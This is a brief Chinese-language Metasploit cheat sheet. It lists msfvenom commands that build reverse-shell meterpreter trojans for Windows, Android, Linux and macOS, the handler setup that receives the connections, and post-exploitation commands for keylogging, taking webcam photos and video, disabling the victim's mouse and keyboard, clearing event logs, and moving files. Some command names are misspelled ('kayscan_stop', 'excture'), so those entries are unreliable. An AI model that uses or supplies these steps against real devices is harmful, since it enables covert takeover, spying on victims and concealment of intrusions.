msfconsole
\ ,__,
\ (oo)____
(__) )\
||--|| *
生成木马
windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=xxx -f exe -o xxx.exe
Android
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=xxxx -o xxx.apk
linux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=xxx -f elf > xxx.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp lhost=192.168.xxx.xxx lport=xxx -f macho > xxx.macho
连接会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
set lport xxxx
exploit
常用命令
uictl disable mouse
# 禁用鼠标
uictl disable keyboard
# 禁用键盘
uictl enable mouse
# 开启鼠标
uictl enable keyboard
# 开启键盘
keyscan_start
# 开启键盘记录
kayscan_stop
# 停止键盘记录
keyscan_dump
# 导出键盘记录数据
webcam_list
# 查看摄像头设备
webcam_snap
# 拍照
webcam_stream
# 开启视频
excture
# 执行目标文件
clearev
# 清理日志
upload
# 上传文件
download
# 下载文件
screenshot
# 截屏
sysinfo
# 系统信息
shutdown
# 关机